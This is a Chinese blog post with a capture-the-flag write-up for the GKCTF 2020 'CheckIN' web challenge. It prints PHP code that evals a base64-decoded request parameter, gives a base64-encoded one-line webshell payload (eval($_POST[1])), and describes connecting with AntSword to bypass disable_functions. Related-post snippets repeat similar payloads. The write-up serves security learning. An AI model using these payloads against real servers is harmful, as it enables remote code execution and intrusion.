每日练习-[GKCTF 2020]CheckIN

最新推荐文章于 2024-07-22 08:52:45 发布
最新推荐文章于 2024-07-22 08:52:45 发布
阅读量130 收藏
点赞数 1
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68113265/article/details/132416266
版权
$_REQUEST的优先级以及disable_function的绕过

本题代码

<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

大致就是Ginkgo接受的值要base64加密,之后他就会执行eval。

先传入phpinfo();查看

disable_function禁用了大多函数,可以使用蚁剑插件进行绕过

$_REQUEST的优先级

$_REQUEST是可以接受$_GET,$_POST,$_Cookie的,

php配置文件默认的处理优先级,默认的数据写入顺序是EGPCS

E代表$_ENV

G代表$_GET

P代表$_POST

C代表$_COOKIE

S代表$_SERVER

 当同时一个参数名,越往后的可以覆盖前面的参数。

 回归本题,利用Ginkgo传入一句话木马。

payload:

?Ginkgo=ZXZhbCgkX1BPU1RbMV0pOw==

本题前面有eval还增加eval原因是eval是把内容当作php代码执行写入$_POST[1]就不是一句话木马了,所以再增加一个eval(disable_function刚好没禁用)

蚁剑连上

根目录有个假flag,真的flag在readflag。

 

 

 
He@11
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF:[GKCTF2020]CheckIN
qq_46230755的博客
12-16 504
这题还是很有意思的,考的点有 先看一下题目给的代码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this
[GKCTF2020]CheckIN
末初的CSDN博客
06-17 1056
题目复现地址 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo'];
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1842
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4330
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
第二周任务[GKCTF2020]
Lumos427的博客
03-26 555
[GKCTF2020]cve版签到 刚看是啥也不会,去百度了一下这题,发现这是一个ssrf漏洞(服务端请求伪造) 下面是在网上找到的介绍 漏洞详情 PHP(PHP:Hypertext Preprocessor,PHP:超文本预处理器)是PHPGroup和开放源代码社区的共同维护的一种开源的通用计算机脚本语言。该语言主要用于Web开发,支持多种数据库及操作系统。 PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存
hence-flight-checkin
05-06
link rel =" import " href =" bower_components/hence-flight-checkin/hence-flight-checkin.html " >发展所有开发都是利用/ src和/ test文件夹中的文件进行的。依存关系元素依赖关系通过NPM& 进行管理。 您...
genshin-mys-checkin:【蚊子的腿也是腿】原神米游社每日签到,原神微博超话签到,领取礼包,自动推送
03-08
genshin-mys-checkin 每天早上7:00〜7:10随机时间签到 部分失败不会使整体流程终止,和你会收到消息来自GitHub的Actions失败提醒邮件 运行前会自动同步主仓库,并使用主仓库文件解决冲突,如有自定义需求请自行修改...
liang-chen-yun-checkin
03-31
报到1:前叉仓库2:在仓库的秘密中记录账号密码设置->秘密2.1: 添加 EMAIL2.2: 添加 PASSWORD
genshin-daily-checkin
04-23
怎么跑 在Docker Swarm上运行 例子: docker service create --name genshin-daily-login truong996/genshin-daily-login 仅运行Docker docker run -d truong996/genshin-daily-login
sau-class-checkin
04-02
关于 这是一个脚本,如果设置正确,它将告诉SAU您的位置 因为大多数课程都是在一个小时开始的,并且一个好学生应该在该时间之前到达并办理登机手续,所以脚本会设法解决这个问题。 如果您在一个小时的更改前5分钟...
绕过disable_function
qq_51770207的博客
09-22 4060
绕过disable_function
[GKCTF2020]CheckIN bypass_php7_disable_functions
偷一个月亮
09-01 448
[GKCTF2020]CheckIN <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = ...
[GKCTF2020]web
臭nana的博客
05-26 1063
CheckIN 打开题目得到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$t
CheckIN
qq_43774856的博客
12-01 392
CheckIN 打开链接,得到源码 <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&
GKCTF2020 checkin
qq_53755216的博客
06-23 317
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
如何在ctf解题实战中绕过disable_function
qq_47168481的博客
01-30 6910
本文介绍将介绍ctf比赛中遇到的三种绕过disable_function的方法
Android 10.0 蓝牙音乐获取歌手、歌曲等信息功能实现
最新发布
安卓兼职framework和app工程师的博客
07-22 1460
在10.0的系统rom定制化开发中,在一些功能性开发中,可能会遇到一些蓝牙音乐的项目,所以会要求在手机端获取 蓝牙音乐的歌手歌曲的信息功能,这就需要了解Bluetooth的音乐播放功能,然后实现这些获取歌手信息和歌曲详情的功能
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值